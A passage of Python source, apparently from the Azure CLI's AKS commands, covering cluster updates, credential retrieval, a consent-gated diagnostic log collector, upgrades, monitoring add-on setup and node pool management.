if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
if attach_acr and detach_acr:
raise CLIError('Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if instance.identity is not None and instance.identity.type == "SystemAssigned":
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"'
' if managed aad not is enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(resource_group_name, name)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector',
'azure-policy': 'azurepolicy',
'kube-dashboard': 'kubeDashboard',
'ingress-appgw': CONST_INGRESS_APPGW_ADDON_NAME
}
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError("A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
sas_token = sas_token.strip('?')
deployment_yaml = urlopen(
"https://raw.githubusercontent.com/Azure/aks-periscope/v0.2/deployment/aks-periscope.yaml").read().decode()
deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
(base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
normalized_fqdn = mc.fqdn.replace('.', '-')
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(normalized_fqdn)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Stroage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
if node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
kubernetes_version,
control_plane_only=False,
no_wait=False,
**kwargs): # pylint: disable=unused-argument
instance = client.get(resource_group_name, name)
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
from knack.prompting import prompt_y_n
upgrade_all = False
instance.kubernetes_version = kubernetes_version
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None, appgw_name=None, appgw_subnet_prefix=None, appgw_id=None, appgw_subnet_id=None, appgw_shared=False, appgw_watch_namespace=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles['azurepolicy'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('azure-policy')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_PREFIX] = appgw_subnet_prefix
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_shared:
addon_profile.config[CONST_INGRESS_APPGW_SHARED] = "true"
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# log analytics only support China East2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
if not addon.enabled:
return None
# workaround for this addon key which has been seen lowercased in the wild
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID'].strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specifying both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
public_ip_per_vm=False,
labels=None,
mode="User",
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
node_taints=taints_array,
scale_set_priority=priority,
enable_node_public_ip=public_ip_per_vm,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if new_node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
